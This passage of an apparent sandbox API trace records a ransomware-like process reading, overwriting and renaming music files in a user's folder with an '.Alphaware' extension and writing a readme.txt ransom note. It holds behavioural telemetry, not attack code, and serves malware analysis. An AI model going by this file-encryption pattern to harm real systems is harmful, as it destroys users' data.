lpOldMode=0x23eb58) returned 1 [0086.854] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\asl2ThVDjfYIFJk_MIxu.wav", dwFileAttributes=0x80) returned 1 [0086.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0086.855] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\asl2ThVDjfYIFJk_MIxu.wav" (normalized: "c:\\users\\keecfmwgj\\music\\asl2thvdjfyifjk_mixu.wav"), fInfoLevelId=0x0, lpFileInformation=0x252f200 | out: lpFileInformation=0x252f200*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdcf2fad0, ftCreationTime.dwHighDateTime=0x1d9694d, ftLastAccessTime.dwLowDateTime=0x750f1fa0, ftLastAccessTime.dwHighDateTime=0x1d969db, ftLastWriteTime.dwLowDateTime=0x750f1fa0, ftLastWriteTime.dwHighDateTime=0x1d969db, nFileSizeHigh=0x0, nFileSizeLow=0xfdc1)) returned 1 [0086.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0086.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0086.855] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\asl2ThVDjfYIFJk_MIxu.wav" (normalized: "c:\\users\\keecfmwgj\\music\\asl2thvdjfyifjk_mixu.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.855] GetFileType (hFile=0x254) returned 0x1 [0086.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0086.856] GetFileType (hFile=0x254) returned 0x1 [0086.856] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xfdc1 [0086.856] ReadFile (in: hFile=0x254, lpBuffer=0x252f488, nNumberOfBytesToRead=0xfdc1, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x252f488*, lpNumberOfBytesRead=0x23eb38*=0xfdc1, lpOverlapped=0x0) returned 1 [0086.857] CloseHandle (hObject=0x254) returned 1 [0086.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0086.883] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\asl2ThVDjfYIFJk_MIxu.wav" (normalized: "c:\\users\\keecfmwgj\\music\\asl2thvdjfyifjk_mixu.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.884] GetFileType (hFile=0x254) returned 0x1 [0086.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0086.884] GetFileType (hFile=0x254) returned 0x1 [0086.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0086.887] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\asl2ThVDjfYIFJk_MIxu.wav" (normalized: "c:\\users\\keecfmwgj\\music\\asl2thvdjfyifjk_mixu.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf2fad0, ftCreationTime.dwHighDateTime=0x1d9694d, ftLastAccessTime.dwLowDateTime=0x750f1fa0, ftLastAccessTime.dwHighDateTime=0x1d969db, ftLastWriteTime.dwLowDateTime=0x85fc8aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15334)) returned 1 [0086.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0086.888] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\asl2ThVDjfYIFJk_MIxu.wav" (normalized: "c:\\users\\keecfmwgj\\music\\asl2thvdjfyifjk_mixu.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\asl2ThVDjfYIFJk_MIxu.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\asl2thvdjfyifjk_mixu.wav.alphaware")) returned 1 [0086.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0086.888] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\music\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.889] GetFileType (hFile=0x254) returned 0x1 [0086.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0086.889] GetFileType (hFile=0x254) returned 0x1 [0086.890] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\desktop.ini", dwFileAttributes=0x80) returned 1 [0086.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0086.891] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x25f0278 | out: lpFileInformation=0x25f0278*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e80a6a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0086.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0086.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0086.891] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.891] GetFileType (hFile=0x254) returned 0x1 [0086.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0086.891] GetFileType (hFile=0x254) returned 0x1 [0086.891] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x1f8 [0086.892] ReadFile (in: hFile=0x254, lpBuffer=0x25f06a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25f06a0*, lpNumberOfBytesRead=0x23eb38*=0x1f8, lpOverlapped=0x0) returned 1 [0086.892] CloseHandle (hObject=0x254) returned 1 [0086.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0086.921] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\music\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.922] GetFileType (hFile=0x254) returned 0x1 [0086.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0086.922] GetFileType (hFile=0x254) returned 0x1 [0086.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0086.923] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86014d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x374)) returned 1 [0086.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0086.924] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\music\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\desktop.ini.alphaware")) returned 1 [0086.924] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav", dwFileAttributes=0x80) returned 1 [0086.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0086.925] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fpmhr.wav"), fInfoLevelId=0x0, lpFileInformation=0x2670fb8 | out: lpFileInformation=0x2670fb8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd33d76c0, ftCreationTime.dwHighDateTime=0x1d9696e, ftLastAccessTime.dwLowDateTime=0xdfbe3b50, ftLastAccessTime.dwHighDateTime=0x1d972ba, ftLastWriteTime.dwLowDateTime=0xdfbe3b50, ftLastWriteTime.dwHighDateTime=0x1d972ba, nFileSizeHigh=0x0, nFileSizeLow=0x141a)) returned 1 [0086.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0086.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0086.925] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fpmhr.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.925] GetFileType (hFile=0x254) returned 0x1 [0086.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0086.925] GetFileType (hFile=0x254) returned 0x1 [0086.926] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x141a [0086.926] ReadFile (in: hFile=0x254, lpBuffer=0x26711c0, nNumberOfBytesToRead=0x141a, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x26711c0*, lpNumberOfBytesRead=0x23eb38*=0x141a, lpOverlapped=0x0) returned 1 [0086.927] CloseHandle (hObject=0x254) returned 1 [0086.985] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav", lpFilePart=0x0) returned 0x22 [0086.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0086.985] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fpmhr.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.986] GetFileType (hFile=0x254) returned 0x1 [0086.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0086.986] GetFileType (hFile=0x254) returned 0x1 [0086.987] WriteFile (in: hFile=0x254, lpBuffer=0x2420778*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2420778*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0086.988] WriteFile (in: hFile=0x254, lpBuffer=0x2420778*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2420778*, lpNumberOfBytesWritten=0x23e9f8*=0xba0, lpOverlapped=0x0) returned 1 [0086.988] CloseHandle (hObject=0x254) returned 1 [0086.990] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav", lpFilePart=0x0) returned 0x22 [0086.990] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav.Alphaware", lpFilePart=0x0) returned 0x2c [0086.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0086.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fpmhr.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd33d76c0, ftCreationTime.dwHighDateTime=0x1d9696e, ftLastAccessTime.dwLowDateTime=0xdfbe3b50, ftLastAccessTime.dwHighDateTime=0x1d972ba, ftLastWriteTime.dwLowDateTime=0x860d3440, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0)) returned 1 [0086.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0086.990] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fpmhr.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fPmhr.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\fpmhr.wav.alphaware")) returned 1 [0086.992] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a", dwFileAttributes=0x80) returned 1 [0086.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0086.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\htd1 u2-lwyk0bzeph.m4a"), fInfoLevelId=0x0, lpFileInformation=0x24226a8 | out: lpFileInformation=0x24226a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8d18cd10, ftCreationTime.dwHighDateTime=0x1d97595, ftLastAccessTime.dwLowDateTime=0x6b1eb5e0, ftLastAccessTime.dwHighDateTime=0x1d975b7, ftLastWriteTime.dwLowDateTime=0x6b1eb5e0, ftLastWriteTime.dwHighDateTime=0x1d975b7, nFileSizeHigh=0x0, nFileSizeLow=0x25e0)) returned 1 [0086.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0086.993] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a", lpFilePart=0x0) returned 0x2f [0086.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0086.994] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\htd1 u2-lwyk0bzeph.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.994] GetFileType (hFile=0x254) returned 0x1 [0086.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0086.994] GetFileType (hFile=0x254) returned 0x1 [0086.994] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x25e0 [0086.994] ReadFile (in: hFile=0x254, lpBuffer=0x2422910, nNumberOfBytesToRead=0x25e0, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2422910*, lpNumberOfBytesRead=0x23eb38*=0x25e0, lpOverlapped=0x0) returned 1 [0086.995] CloseHandle (hObject=0x254) returned 1 [0087.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0087.053] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\htd1 u2-lwyk0bzeph.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.054] GetFileType (hFile=0x254) returned 0x1 [0087.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0087.054] GetFileType (hFile=0x254) returned 0x1 [0087.055] WriteFile (in: hFile=0x254, lpBuffer=0x24ba088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24ba088*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0087.056] WriteFile (in: hFile=0x254, lpBuffer=0x24ba088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24ba088*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0087.056] WriteFile (in: hFile=0x254, lpBuffer=0x24ba088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea18, lpOverlapped=0x0 | out: lpBuffer=0x24ba088*, lpNumberOfBytesWritten=0x23ea18*=0x1000, lpOverlapped=0x0) returned 1 [0087.056] WriteFile (in: hFile=0x254, lpBuffer=0x24ba088*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24ba088*, lpNumberOfBytesWritten=0x23e9f8*=0x360, lpOverlapped=0x0) returned 1 [0087.056] CloseHandle (hObject=0x254) returned 1 [0087.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0087.060] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\htd1 u2-lwyk0bzeph.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d18cd10, ftCreationTime.dwHighDateTime=0x1d97595, ftLastAccessTime.dwLowDateTime=0x6b1eb5e0, ftLastAccessTime.dwHighDateTime=0x1d975b7, ftLastWriteTime.dwLowDateTime=0x8616b9c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3360)) returned 1 [0087.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0087.060] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\htd1 u2-lwyk0bzeph.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\HTD1 u2-LwYK0bzEph.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\htd1 u2-lwyk0bzeph.m4a.alphaware")) returned 1 [0087.061] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a", dwFileAttributes=0x80) returned 1 [0087.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0087.061] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\jtwiwa.m4a"), fInfoLevelId=0x0, lpFileInformation=0x24bbfd0 | out: lpFileInformation=0x24bbfd0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdb9556b0, ftCreationTime.dwHighDateTime=0x1d96e1b, ftLastAccessTime.dwLowDateTime=0x5182aae0, ftLastAccessTime.dwHighDateTime=0x1d9709b, ftLastWriteTime.dwLowDateTime=0x5182aae0, ftLastWriteTime.dwHighDateTime=0x1d9709b, nFileSizeHigh=0x0, nFileSizeLow=0x46cd)) returned 1 [0087.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0087.062] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a", lpFilePart=0x0) returned 0x23 [0087.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0087.062] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\jtwiwa.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.062] GetFileType (hFile=0x254) returned 0x1 [0087.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0087.062] GetFileType (hFile=0x254) returned 0x1 [0087.062] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x46cd [0087.063] ReadFile (in: hFile=0x254, lpBuffer=0x24bc1d8, nNumberOfBytesToRead=0x46cd, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24bc1d8*, lpNumberOfBytesRead=0x23eb38*=0x46cd, lpOverlapped=0x0) returned 1 [0087.064] CloseHandle (hObject=0x254) returned 1 [0087.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0087.088] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\jtwiwa.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.089] GetFileType (hFile=0x254) returned 0x1 [0087.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0087.089] GetFileType (hFile=0x254) returned 0x1 [0087.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0087.091] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\jtwiwa.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb9556b0, ftCreationTime.dwHighDateTime=0x1d96e1b, ftLastAccessTime.dwLowDateTime=0x5182aae0, ftLastAccessTime.dwHighDateTime=0x1d9709b, ftLastWriteTime.dwLowDateTime=0x861b7c80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f34)) returned 1 [0087.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0087.091] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\jtwiwa.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\JtwiWA.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\jtwiwa.m4a.alphaware")) returned 1 [0087.091] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\QCDZICFDAJnNsJNJRg.m4a", dwFileAttributes=0x80) returned 1 [0087.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0087.092] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\QCDZICFDAJnNsJNJRg.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qcdzicfdajnnsjnjrg.m4a"), fInfoLevelId=0x0, lpFileInformation=0x256c608 | out: lpFileInformation=0x256c608*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c77ae00, ftCreationTime.dwHighDateTime=0x1d9759c, ftLastAccessTime.dwLowDateTime=0x191a0d50, ftLastAccessTime.dwHighDateTime=0x1d97696, ftLastWriteTime.dwLowDateTime=0x191a0d50, ftLastWriteTime.dwHighDateTime=0x1d97696, nFileSizeHigh=0x0, nFileSizeLow=0x8e6)) returned 1 [0087.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0087.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0087.092] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\QCDZICFDAJnNsJNJRg.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qcdzicfdajnnsjnjrg.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0087.092] ReadFile (in: hFile=0x254, lpBuffer=0x256d170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x256d170*, lpNumberOfBytesRead=0x23eb38*=0x8e6, lpOverlapped=0x0) returned 1 [0087.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0087.123] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\QCDZICFDAJnNsJNJRg.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qcdzicfdajnnsjnjrg.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0087.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0087.125] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\QCDZICFDAJnNsJNJRg.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qcdzicfdajnnsjnjrg.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c77ae00, ftCreationTime.dwHighDateTime=0x1d9759c, ftLastAccessTime.dwLowDateTime=0x191a0d50, ftLastAccessTime.dwHighDateTime=0x1d97696, ftLastWriteTime.dwLowDateTime=0x86203f40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcb4)) returned 1 [0087.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0087.125] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\QCDZICFDAJnNsJNJRg.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qcdzicfdajnnsjnjrg.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\QCDZICFDAJnNsJNJRg.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\qcdzicfdajnnsjnjrg.m4a.alphaware")) returned 1 [0087.126] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\qoDFdF- OjUNXs8zmjC.m4a", dwFileAttributes=0x80) returned 1 [0087.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0087.126] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\qoDFdF- OjUNXs8zmjC.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qodfdf- ojunxs8zmjc.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23f1488 | out: lpFileInformation=0x23f1488*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfb29cd10, ftCreationTime.dwHighDateTime=0x1d96ffd, ftLastAccessTime.dwLowDateTime=0x22371e00, ftLastAccessTime.dwHighDateTime=0x1d975dd, 